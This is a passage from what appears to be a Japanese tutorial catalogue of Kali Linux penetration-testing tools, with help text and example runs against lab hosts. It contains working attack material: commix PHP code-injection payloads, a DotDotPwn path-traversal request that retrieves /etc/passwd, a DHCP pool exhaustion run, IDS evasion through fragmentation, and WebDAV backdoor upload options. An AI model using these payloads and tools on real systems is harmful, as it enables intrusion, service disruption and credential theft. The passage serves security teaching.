-p TEST_PARAMETER Testable parameter(s).
--skip=SKIP_PARA.. Skip testing for given parameter(s).
--suffix=SUFFIX Injection payload suffix string.
--prefix=PREFIX Injection payload prefix string.
--technique=TECH Specify injection technique(s) to use.
--skip-technique.. Specify injection technique(s) to skip.
--maxlen=MAXLEN Set the max length of output for time-related
injection techniques (Default: 10000 chars).
--delay=DELAY Seconds to delay between each HTTP request.
--time-sec=TIMESEC Seconds to delay the OS response (Default: 1).
--tmp-path=TMP_P.. Set the absolute path of web server\'s temp directory.
--web-root=WEB_R.. Set the web server document root directory (e.g.
'/var/www').
--alter-shell=AL.. Use an alternative os-shell (e.g. 'Python').
--os-cmd=OS_CMD Execute a single operating system command.
--os=OS Force back-end operating system (e.g. 'Windows' or
'Unix').
--tamper=TAMPER Use given script(s) for tampering injection data.
--msf-path=MSF_P.. Set a local path where metasploit is installed.
Detection:
These options can be used to customize the detection phase.
--level=LEVEL Level of tests to perform (1-3, Default: 1).
--skip-calc Skip the mathematic calculation during the detection
phase.
--skip-empty Skip testing the parameter(s) with empty value(s).
--failed-tries=F.. Set a number of failed injection tries, in file-based
technique.
--smart Perform thorough tests only if positive heuristic(s).
Miscellaneous:
--ignore-depende.. Ignore all required third-party library dependencies.
--list-tampers Display list of available tamper scripts.
--alert=ALERT Run host OS command(s) when injection point is found.
--no-logging Disable logging to a file.
--purge Safely remove all content from commix data directory.
--skip-waf Skip heuristic detection of WAF/IPS/IDS protection.
--mobile Imitate smartphone through HTTP User-Agent header.
--offline Work in offline mode.
--wizard Simple wizard interface for beginner users.
--disable-coloring Disable console output coloring.
■ 使用例
# 動作確認用アプリのcommix-testbedの以下のプログラムでOSインジェクションを試行
# https://github.com/commixproject/commix-testbed/blob/master/scenarios/regular/GET/preg_replace.php
root@kali:~# commix --url "http://localhost/scenarios/regular/GET/str_replace.php?user=test" --method "GET" --level 1 -v 1
[...]
[02:28:31] [payload] test%29%27%7Dexec%28phpinfo%28%29%29%27%23
[02:28:31] [payload] test%29%27%7Deval%28phpinfo%28%29%29%27%23
[02:28:31] [payload] test%29%27%7Dsystem%28phpinfo%28%29%29%27%23
[02:28:31] [payload] test%27.phpinfo%28%29.%27
[02:28:31] [payload] test%27.exec%28phpinfo%28%29%29.%27
[02:28:31] [payload] test%27.eval%28phpinfo%28%29%29.%27
[02:28:31] [payload] test%27.system%28phpinfo%28%29%29.%27
[02:28:31] [payload] test%7B%24%7Bphpinfo%28%29%7D%7D
[02:28:31] [info] Heuristic (basic) tests shows that GET parameter 'user' might be injectable via (results-based) dynamic code evaluation technique (possible PHP version: '5.5.9').
[...]
実際にpayloadのtest%7B%24%7Bphpinfo%28%29%7D%7Dを試した結果
davtest
WebDAVが有効なサーバーに対してファイル作成などの不正操作を試行します。
■ 使用方法
root@kali:~# davtest --help
/usr/bin/davtest -url <url> [options]
-auth+ Authorization (user:password)
-realm+ Auth Realm
-cleanup delete everything uploaded when done
-directory+ postfix portion of directory to create
-debug+ DAV debug level 1-3 (2 & 3 log req/resp to /tmp/perldav_debug.txt)
-move PUT text files then MOVE to executable
-copy PUT text files then COPY to executable
-nocreate don\'t create a directory
-quiet only print out summary
-rand+ use this instead of a random string for filenames
-sendbd+ send backdoors:
auto - for any succeeded test
ext - extension matching file name(s) in backdoors/ dir
-uploadfile+ upload this file (requires -uploadloc)
-uploadloc+ upload file to this relative location/name (requires -uploadfile)
-url+ url of DAV location
Example: /usr/bin/davtest -url http://localhost/davdir
■ 使用例
root@kali:~# davtest -url http://192.168.11.4/uploads/ -auth admin:admin
********************************************************
Testing DAV connection
OPEN SUCCEED: http://192.168.11.4/uploads
********************************************************
NOTE Random string for this session: vz1C_iC2AlPID
********************************************************
Creating directory
MKCOL SUCCEED: Created http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID
********************************************************
Sending test files
PUT asp SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.asp
PUT html SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.html
PUT jhtml SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.jhtml
PUT txt SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.txt
PUT aspx SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.aspx
PUT pl SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.pl
PUT php SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.php
PUT jsp SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.jsp
PUT shtml SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.shtml
PUT cgi SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.cgi
PUT cfm SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.cfm
********************************************************
Checking for test file execution
EXEC asp FAIL
EXEC html SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.html
EXEC html FAIL
EXEC jhtml FAIL
EXEC txt SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.txt
EXEC txt FAIL
EXEC aspx FAIL
EXEC pl FAIL
EXEC php FAIL
EXEC jsp FAIL
EXEC shtml SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.shtml
EXEC shtml FAIL
EXEC cgi FAIL
EXEC cfm FAIL
********************************************************
/usr/bin/davtest Summary:
Created: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.asp
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.html
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.jhtml
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.txt
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.aspx
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.pl
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.php
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.jsp
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.shtml
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.cgi
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.cfm
Executes: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.html
Executes: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.txt
Executes: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.shtml
DHCPig
DHCPサーバーに対してMACアドレスを偽装しながらIPアドレスの払い出しを要求します(DHCP枯渇攻撃)。
■ 使用方法
root@kali:~# dhcpig --help
Usage:
pig.py [-h -v -6 -1 -s -f -t -a -i -o -l -x -y -z -g -r -n -c ] <interface>
Options:
-h, --help <-- you are here :)
-v, --verbosity ... 0 ... no (3)
1 ... minimal
10 ... default
99 ... debug
-6, --ipv6 ... DHCPv6 (off, DHCPv4 by default)
-1, --v6-rapid-commit ... enable RapidCommit (2way ip assignment instead of 4way) (off)
-s, --client-src ... a list of client macs 00:11:22:33:44:55,00:11:22:33:44:56 (Default: <random>)
-O, --request-options ... option-codes to request e.g. 21,22,23 or 12,14-19,23 (Default: 0-80)
-f, --fuzz ... randomly fuzz packets (off)
-t, --threads ... number of sending threads (1)
-a, --show-arp ... detect/print arp who_has (off)
-i, --show-icmp ... detect/print icmps requests (off)
-o, --show-options ... print lease infos (off)
-l, --show-lease-confirm ... detect/print dhcp replies (off)
-g, --neighbors-attack-garp ... knock off network segment using gratious arps (off)
-r, --neighbors-attack-release ... release all neighbor ips (off)
-n, --neighbors-scan-arp ... arp neighbor scan (off)
-x, --timeout-threads ... thread spawn timer (0.4)
-y, --timeout-dos ... DOS timeout (8) (wait time to mass grat.arp)
-z, --timeout-dhcprequest ... dhcp request timeout (2)
-c, --color ... enable color output (off)
■ 使用例
root@kali:~# dhcpig eth0
[ -- ] [INFO] - using interface eth0
[DBG ] Thread 0 - (Sniffer) READY
[DBG ] Thread 1 - (Sender) READY
[--->] DHCP_Discover
[--->] DHCP_Discover
[<---] DHCP_Offer 02:42:ac:13:00:02 0.0.0.0 IP: 192.168.50.2 for MAC=[de:ad:09:6c:90:b2:00:00:00:00:00:00:00:00:00:00]
[--->] DHCP_Request 192.168.50.2
[--->] DHCP_Discover
[<---] DHCP_Offer 02:42:ac:13:00:02 0.0.0.0 IP: 192.168.50.3 for MAC=[de:ad:02:14:dd:5b:00:00:00:00:00:00:00:00:00:00]
[--->] DHCP_Request 192.168.50.3
[--->] DHCP_Discover
[<---] DHCP_Offer 02:42:ac:13:00:02 0.0.0.0 IP: 192.168.50.4 for MAC=[de:ad:1c:4b:c5:94:00:00:00:00:00:00:00:00:00:00]
[--->] DHCP_Request 192.168.50.4
[--->] DHCP_Discover
[...]
[--->] DHCP_Discover
[ -- ] timeout waiting on dhcp packet count 2
[--->] DHCP_Discover
[--->] DHCP_Discover
[--->] DHCP_Discover
[--->] DHCP_Discover
[--->] DHCP_Discover
[--->] DHCP_Discover
[--->] DHCP_Discover
[ -- ] timeout waiting on dhcp packet count 3
[--->] DHCP_Discover
[--->] DHCP_Discover
[--->] DHCP_Discover
[--->] DHCP_Discover
[--->] DHCP_Discover
[--->] DHCP_Discover
[ -- ] timeout waiting on dhcp packet count 4
[ ?? ] waiting for DHCP pool exhaustion...
[ -- ] [DONE] DHCP pool exhausted!
DotDotPwn
Webアプリケーションに対してディレクトリトラバーサルの様々なペイロードを実行します。
■ 使用方法
root@kali:~# dotdotpwn --help
Usage: ./dotdotpwn.pl -m <module> -h <host> [OPTIONS]
Available options:
-m Module [http | http-url | ftp | tftp | payload | stdout]
-h Hostname
-O Operating System detection for intelligent fuzzing (nmap)
-o Operating System type if known ("windows", "unix" or "generic")
-s Service version detection (banner grabber)
-d Depth of traversals (e.g. deepness 3 equals to ../../../; default: 6)
-f Specific filename (e.g. /etc/motd; default: according to OS detected, defaults in TraversalEngine.pm)
-E Add @Extra_files in TraversalEngine.pm (e.g. web.config, httpd.conf, etc.)
-S Use SSL for HTTP and Payload module (not needed for http-url, use a https:// url instead)
-u URL with the part to be fuzzed marked as TRAVERSAL (e.g. http://foo:8080/id.php?x=TRAVERSAL&y=31337)
-k Text pattern to match in the response (http-url & payload modules - e.g. "root:" if trying /etc/passwd)
-p Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword
-x Port to connect (default: HTTP=80; FTP=21; TFTP=69)
-t Time in milliseconds between each test (default: 300 (.3 second))
-X Use the Bisection Algorithm to detect the exact deepness once a vulnerability has been found
-e File extension appended at the end of each fuzz string (e.g. ".php", ".jpg", ".inc")
-U Username (default: 'anonymous')
-P Password (default: 'dot@dot.pwn')
-M HTTP Method to use when using the 'http' module [GET | POST | HEAD | COPY | MOVE] (default: GET)
-r Report filename (default: 'HOST_MM-DD-YYYY_HOUR-MIN.txt')
-b Break after the first vulnerability is found
-q Quiet mode (doesn\'t print each attempt)
-C Continue if no data was received from host
■ 使用例
# 脆弱性テストを行うサーバーに送信するリクエストヘッダー
# ?page=TRAVERSALのTRAVERSALの部分が攻撃用のペイロードに置換される
root@kali:~# cat payload.txt
GET /vulnerabilities/fi/?page=TRAVERSAL HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6,zh;q=0.5
Cache-Control: max-age=0
Connection: keep-alive
Cookie: PHPSESSID=oj9u2u36v2fu15c20q52pg33a7; security=low
Host: 192.168.11.4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
# レスポンスに"root:"が含まれている場合は脆弱性ありと判断して終了する
root@kali:~# dotdotpwn -m payload -h 192.168.11.4 -x 80 -b -p payload.txt -k "root:" -f /etc/passwd
[...]
[+] Report name: Reports/192.168.11.4_09-29-2024_03-17.txt
[========== TARGET INFORMATION ==========]
[+] Hostname: 192.168.11.4
[+] Protocol: N/A
[+] Port: 80
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Appending '/etc/passwd' to the Traversal Strings
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 5514
[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)
[*] Payload with: ../etc/passwd
[*] Payload with: ../../etc/passwd
[*] Payload with: ../../../etc/passwd
[*] Payload with: ../../../../etc/passwd
[*] VULNERABLE PAYLOAD:
GET /vulnerabilities/fi/?page=../../../../../etc/passwd HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6,zh;q=0.5
Cache-Control: max-age=0
Connection: keep-alive
Cookie: PHPSESSID=oj9u2u36v2fu15c20q52pg33a7; security=low
Host: 192.168.11.4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
[+] Fuzz testing finished after 0.43 minutes (26 seconds)
[+] Total Traversals found: 1
[+] Report saved: Reports/192.168.11.4_09-29-2024_03-17.txt
実際にpayloadの/vulnerabilities/fi/?page=../../../../../etc/passwdを試した結果
Fragrouter
IPパケットをフラグメント化したデータストリームに変換して転送します(フラグメントパケットを的確に処理できないIDSのルールを回避する)。
■ 使用方法
root@kali:~# fragrouter
Usage: fragrouter [-i interface] [-p] [-g hop] [-G hopcount] ATTACK
where ATTACK is one of the following:
-B1: base-1: normal IP forwarding
-F1: frag-1: ordered 8-byte IP fragments
-F2: frag-2: ordered 24-byte IP fragments
-F3: frag-3: ordered 8-byte IP fragments, one out of order
-F4: frag-4: ordered 8-byte IP fragments, one duplicate
-F5: frag-5: out of order 8-byte fragments, one duplicate
-F6: frag-6: ordered 8-byte fragments, marked last frag first
-F7: frag-7: ordered 16-byte fragments, fwd-overwriting
-T1: tcp-1: 3-whs, bad TCP checksum FIN/RST, ordered 1-byte segments
-T3: tcp-3: 3-whs, ordered 1-byte segments, one duplicate
-T4: tcp-4: 3-whs, ordered 1-byte segments, one overwriting
-T5: tcp-5: 3-whs, ordered 2-byte segments, fwd-overwriting
-T7: tcp-7: 3-whs, ordered 1-byte segments, interleaved null segments
-T8: tcp-8: 3-whs, ordered 1-byte segments, one out of order
-T9: tcp-9: 3-whs, out of order 1-byte segments
-C2: tcbc-2: 3-whs, ordered 1-byte segments, interleaved SYNs
-C3: tcbc-3: ordered 1-byte null segments, 3-whs, ordered 1-byte segments
-R1: tcbt-1: 3-whs, RST, 3-whs, ordered 1-byte segments
-I2: ins-2: 3-whs, ordered 1-byte segments, bad TCP checksums
-I3: ins-3: 3-whs, ordered 1-byte segments, no ACK set
-M1: misc-1: Windows NT 4 SP2 - http://www.dataprotect.com/ntfrag/
-M2: misc-2: Linux IP chains - http://www.dataprotect.com/ipchains/
■ 使用例
# ホスト2でルーターを起動
root@kali_2:~# fragrouter -i eth0 -F1
fragrouter: frag-1: ordered 8-byte IP fragments
# ホスト1でホスト3へのトラフィックをfragrouter(ホスト2)を経由するように変更
root@kali_1:~# ip route add 192.168.11.5 via 192.168.11.4 dev eth0
# ホスト3にPING
root@kali_1:~# ping 192.168.11.5 -c 1
PING 192.168.11.5 (192.168.11.5) 56(84) bytes of data.
64 bytes from 192.168.11.5: icmp_seq=1 ttl=64 time=0.080 ms
--- 192.168.11.5 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.080/0.080/0.080/0.000 ms
# fragrouterにログが表示される
root@kali_2:~# fragrouter -i eth0 -F1
fragrouter: frag-1: ordered 8-byte IP fragments
192.168.11.3 > 192.168.11.5: icmp: type 8 code 0 (frag 27452:8@0+)
192.168.11.3 > 192.168.11.5: (frag 27452:8@8+)
192.168.11.3 > 192.168.11.5: (frag 27452:8@16+)
192.168.11.3 > 192.168.11.5: (frag 27452:8@24+)
192.168.11.3 > 192.168.11.5: (frag 27452:8@32+)
192.168.11.3 > 192.168.11.5: (frag 27452:8@40+)
192.168.11.3 > 192.168.11.5: (frag 27452:8@48+)
192.168.11.3 > 192.168.11.5: (frag 27452:8@56)
# ホスト3のダンプ(8バイトに分割されている)
root@kali_3:~# tcpdump -n -i eth0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
09:00:34.181539 IP 192.168.11.3 > 192.168.11.5: ICMP echo request, id 14, seq 1, length 64
09:00:34.181567 IP 192.168.11.5 > 192.168.11.3: ICMP echo reply, id 14, seq 1, length 64
09:00:34.436110 IP 192.168.11.3 > 192.168.11.5: ICMP echo request, id 14, seq 1, length 8
09:00:34.436112 IP 192.168.11.3 > 192.168.11.5: ip-proto-1
09:00:34.436113 IP 192.168.11.3 > 192.168.11.5: ip-proto-1
09:00:34.436113 IP 192.168.11.3 > 192.168.11.5: ip-proto-1
09:00:34.436113 IP 192.168.11.3 > 192.168.11.5: ip-proto-1
09:00:34.436114 IP 192.168.11.3 > 192.168.11.5: ip-proto-1
09:00:34.436114 IP 192.168.11.3 > 192.168.11.5: ip-proto-1
09:00:34.436115 IP 192.168.11.3 > 192.168.11.5: ip-proto-1
09:00:34.436128 IP 192.168.11.5 > 192.168.11.3: ICMP echo reply, id 14, seq 1, length 64
getsploit
エクスプロイトの検索およびダウンロードを行います。
■ 使用方法
root@kali:~# getsploit --help
Options:
-h, --help show this help message and exit
-t, --title Search JUST the exploit title (Default is description
and source code).
-j, --json Show result in JSON format.
-m, --mirror Mirror (aka copies) search result exploit files to the
subdirectory with your search query name.
-c COUNT, --count=COUNT
Search limit. Default 10.
-l, --local Perform search in the local database instead of
searching online.
-u, --update Update getsploit.db database. Will be downloaded in
the script path.
■ 使用例
root@kali:~# getsploit laravel
To use getsploit you need to obtain Vulners API key at https://vulners.com
Please, enter API key: *****************
Total found exploits: 10
Web-search URL: https://vulners.com/search?query=bulletinFamily%3Aexploit+AND+laravel
+----------------------+--------------------------------+------------------------------------------------------------------------+
| ID | Exploit Title | URL |
+======================+================================+========================================================================+
| 2566E785-0AA3-54BD- | Exploit for Unrestricted | https://vulners.com/githubexploit/2566E785-0AA3-54BD-994A-D636B5656220 |
| 994A-D636B5656220 | Upload of File with Dangerous | |
| | Type in Laravel-Admin | |
+----------------------+--------------------------------+------------------------------------------------------------------------+
| 17EE6C09-2538-52A3- | Exploit for CVE-2021-3129 | https://vulners.com/githubexploit/17EE6C09-2538-52A3-8C5C-973170ACDF29 |
| 8C5C-973170ACDF29 | | |
+----------------------+--------------------------------+------------------------------------------------------------------------+
| 35896337-DA85-5D42- | Exploit for CVE-2021-3129 | https://vulners.com/githubexploit/35896337-DA85-5D42-B9FC-4DF2E3EC881E |
| B9FC-4DF2E3EC881E | | |
+----------------------+--------------------------------+------------------------------------------------------------------------+
| F87C6B04-4AFB-5235- | Exploit for CVE-2021-3129 | https://vulners.com/githubexploit/F87C6B04-4AFB-5235-8E72-31C29A8028B5 |
| 8E72-31C29A8028B5 | | |
+----------------------+--------------------------------+------------------------------------------------------------------------+
| 272FC334-4DD4-570F- | Exploit for CVE-2021-3129 | https://vulners.com/githubexploit/272FC334-4DD4-570F-AB53-1BF7758BA869 |
| AB53-1BF7758BA869 | | |
+----------------------+--------------------------------+------------------------------------------------------------------------+
| CCA6FED9-9A16-59E2- | Exploit for Unrestricted | https://vulners.com/githubexploit/CCA6FED9-9A16-59E2-8C2C-2783C8B3C19A |
| 8C2C-2783C8B3C19A | Upload of File with Dangerous | |
| | Type in Laravel Framework | |
+----------------------+--------------------------------+------------------------------------------------------------------------+
| 156C1F8E-E328-5619- | Exploit for CVE-2021-3129 | https://vulners.com/githubexploit/156C1F8E-E328-5619-AAD0-B7C3DF011B08 |
| AAD0-B7C3DF011B08 | | |
+----------------------+--------------------------------+------------------------------------------------------------------------+
| 1337DAY-ID-39623 | FleetCart 4.1.1 Information | https://vulners.com/zdt/1337DAY-ID-39623 |
| | Disclosure Vulnerability | |
+----------------------+--------------------------------+------------------------------------------------------------------------+
| 7495BDC7-BA22-5D7D- | Exploit for CVE-2021-3129 | https://vulners.com/githubexploit/7495BDC7-BA22-5D7D-92B8-B3FD263480F9 |
| 92B8-B3FD263480F9 | | |
+----------------------+--------------------------------+------------------------------------------------------------------------+
| PACKETSTORM:178770 | FleetCart 4.1.1 Information | https://vulners.com/packetstorm/PACKETSTORM:178770 |
| | Disclosure | |
+----------------------+--------------------------------+------------------------------------------------------------------------+
root@kali:~# getsploit -m laravel
root@kali:~# ls ./laravel
1337day-id-39623.txt 2566e785-0aa3-54bd-994a-d636b5656220.txt 7495bdc7-ba22-5d7d-92b8-b3fd263480f9.txt packetstorm178770.txt
156c1f8e-e328-5619-aad0-b7c3df011b08.txt 272fc334-4dd4-570f-ab53-1bf7758ba869.txt cca6fed9-9a16-59e2-8c2c-2783c8b3c19a.txt
17ee6c09-2538-52a3-8c5c-973170acdf29.txt 35896337-da85-5d42-b9fc-4df2e3ec881e.txt f87c6b04-4afb-5235-8e72-31c29a8028b5.txt
humble
HTTPレスポンスヘッダーのチェックを行います。
■ 使用方法
root@kali:~# humble --help
usage: humble.py [-h] [-a] [-b] [-df] [-e [TESTSSL_PATH]] [-f [FINGERPRINT_TERM]] [-g] [-grd] [-l {es}] [-lic] [-o {csv,html,json,pdf,txt}]
[-op OUTPUT_PATH] [-r] [-s [SKIP_HEADERS ...]] [-u URL] [-ua USER_AGENT] [-v]
options:
-h, --help show this help message and exit
-a Shows statistics of the performed analysis; will be global if the '-u' parameter is omitted
-b Shows overall findings; if this parameter is omitted detailed ones will be shown
-df Do not follow redirects; if this parameter is omitted the last redirection will be the one analyzed
-e [TESTSSL_PATH] Shows TLS/SSL checks; requires the PATH of https://testssl.sh/
-f [FINGERPRINT_TERM] Shows fingerprint statistics; will be the Top 20 if 'FINGERPRINT_TERM', e.g. 'Google', is omitted
-g Shows guidelines for enabling security HTTP response headers on popular servers/services
-grd Shows the checks to grade an analysis, along with advice for improvement
-l {es} Defines the language for displaying analysis, errors and messages; will be English if this parameter is omitted
-lic Shows the license for 'humble', along with permissions, limitations and conditions.
-o {csv,html,json,pdf,txt} Exports analysis to 'humble_scheme_URL_port_yyyymmdd_hhmmss_language.ext' file; csv/json will have a brief
analysis
-op OUTPUT_PATH Exports analysis to 'OUTPUT_PATH'; if this parameter is omitted the PATH of 'humble.py' will be used
-r Shows HTTP response headers and a detailed analysis; '-b' parameter will take priority
-s [SKIP_HEADERS ...] Skips 'deprecated/insecure' and 'missing' checks for the indicated 'SKIP_HEADERS' (separated by spaces)
-u URL Scheme, host and port to analyze. E.g. https://google.com
-ua USER_AGENT User-Agent ID from 'additional/user_agents.txt' file to use. '0' will show all and '1' is the default
-v, --version Checks for updates at https://github.com/rfc-st/humble
examples:
-a -l es Shows statistics (in Spanish) of the analysis performed against all URLs
-f Google Shows HTTP fingerprint headers related to the term 'Google'
-u URL -a Shows statistics of the analysis performed against the URL
-u URL -b Analyzes the URL and reports overall findings
-u URL -b -o csv Analyzes the URL and exports overall findings to CSV
-u URL -l es Analyzes the URL and reports (in Spanish) detailed findings
-u URL -o pdf Analyzes the URL and exports detailed findings to PDF
-u URL -r Analyzes the URL and reports detailed findings along with HTTP response headers
-u URL -s ETag NEL Analyzes the URL and skips 'deprecated/insecure' and 'missing' checks for 'ETag' and 'NEL' headers
-u URL -ua 4 Analyzes the URL using the fourth User-Agent of 'additional/user_agents.txt' file
■ 使用例
root@kali:~# humble -u http://192.168.11.4 -b
[1. Missing HTTP Security Headers]
Cache-Control
Clear-Site-Data
Cross-Origin-Embedder-Policy
Cross-Origin-Opener-Policy
Cross-Origin-Resource-Policy
Content-Security-Policy
NEL (Experimental HTTP header)
Permissions-Policy
Referrer-Policy
Strict-Transport-Security
X-Content-Type-Options
X-Permitted-Cross-Domain-Policies
X-Frame-Options
[2. Fingerprint HTTP Response Headers]
Server
[3. Deprecated HTTP Response Headers/Protocols and Insecure Values]
Set-Cookie (Insecure Attributes)
Vary (Potentially Unsafe Header)
[4. Empty HTTP Response Headers Values]
Nothing to report, all seems OK!
[5. Browser Compatibility for Enabled HTTP Security Headers]
Content-Type: https://caniuse.com/?search=Content-Type
Set-Cookie: https://caniuse.com/?search=Set-Cookie
Vary: https://caniuse.com/?search=Vary
Analysis done in 0.79 seconds! (changes with respect to the last analysis in parentheses)
Missing headers: 13 (First Analysis)
Fingerprint headers: 1 (First Analysis)
Deprecated/Insecure headers: 2 (First Analysis)
Empty headers: 0 (First Analysis)
Findings to review: 16 (First Analysis)
Analysis Grade: D (Review 'Deprecated/Insecure headers')
ident-user-enum
identサービス (113/TCP) に問い合わせを行い指定したポートをリッスンしているプロセスのオーナーを割り出します。
■ 使用方法
root@kali:~# ident-user-enum --help
Usage: ident-user-enum.pl ip port [ port [ port ... ] ]
■ 使用方法
root@kali:~# ident-user-enum 192.168.11.4 21 22 23 25 80 3306 5432
192.168.11.4:21 root
192.168.11.4:22 root
192.168.11.4:23 root
192.168.11.4:25 postfix
192.168.11.4:80 <unknown>
192.168.11.4:3306 mysql
192.168.11.4:5432 postgres
iSMTP
SMTPユーザー列挙(RCPT TOおよびVRFY)、内部スプーフィング、オープンリレーのテストを行います。
■ 使用方法
root@kali:~# ismtp
Usage: ./iSMTP.py <OPTIONS>
Required:
-f <import file> Imports a list of SMTP servers for testing.
(Cannot use with '-h'.)
-h <host> The target IP and port (IP:port).
(Cannot use with '-f'.)
Spoofing:
-i <consultant email> The consultant\'s email address.
-s <sndr email> The sender\'s email address.
-r <rcpt email> The recipient\'s email address.
--sr <email> Specifies both the sender's and recipient\'s email address.
-S <sndr name> The sender\'s first and last name.
-R <rcpt name> The recipient\'s first and last name.
--SR <name> Specifies both the sender\'s and recipient\'s first and last name.
-m Enables SMTP spoof testing.
-a Includes .txt attachment with spoofed email.
SMTP enumeration:
-e <file> Enable SMTP user enumeration testing and imports email list.
-l <1|2|3> Specifies enumeration type (1 = VRFY, 2 = RCPT TO, 3 = all).
(Default is 3.)
SMTP relay:
-i <consultant email> The consultant\'s email address.
-x Enables SMTP external relay testing.
Misc:
-t <secs> The timeout value. (Default is 10.)
-o Creates "ismtp-results" directory and writes output to
ismtp-results/smtp_<service>_<ip>(port).txt
■ 使用例
root@kali:~# ismtp -h 192.168.11.4 -e emails.txt -l 2
Testing SMTP server [user enumeration]: 192.168.11.4:25
Emails provided for testing: 2
Performing SMTP RCPT TO test...
[+] hello@localhost --- [ valid ]
[-] halo@localhost ---- [ invalid ]
Completed SMTP user enumeration test.
jSQL Injection
標的となるアプリケーションのSQLインジェクションの脆弱性を利用してDBの情報を窃取します。
■ 使用例
脆弱性のあるアプリケーションからDB一覧およびテーブル一覧を窃取
mxcheck
メールサーバーに関する情報をスキャンしてDNSレコード(A/MX/PTR/SPF/MTA-STS/DKIM/DMARC)や開いているポート、オープンリレーの有無などを表示します。
■ 使用方法
root@kali:~# mxcheck --help
Usage of mxcheck:
-b, --blacklist Check if the service is on blacklists
-S, --dkim-selector string The DKIM selector. If set a DKIM check is performed on the provided service domain
-d, --dnsserver string The dns server to be requested (default "8.8.8.8")
-f, --mailfrom string Set the mailFrom address (default "info@foo.wtf")
-t, --mailto string Set the mailTo address (default "info@baz.wtf")
-n, --no-prompt Answer yes to all questions
-s, --service string The service host to check
-u, --updatecheck Check for new version of mxcheck
-v, --version Version and license
-w, --write-tsv Write tsv formated report to file
■ 使用例
root@kali:~# mxcheck -s *****.dev -n
INFO: 2024/10/25 07:12:46 == Checking: *****.dev ==
INFO: 2024/10/25 07:12:46 Found MX:
INFO: 2024/10/25 07:12:46 *****.ne.jp.
INFO: 2024/10/25 07:12:46 == Checking DMARC record ==
INFO: 2024/10/25 07:12:46 DMARC set
INFO: 2024/10/25 07:12:46 _dmarc.*****.dev. 300 IN TXT "v=DMARC1; p=none; rua=mailto:eea8b9f981e94fd6ae64d9652012ca88@dmarc-reports.cloudflare.net"
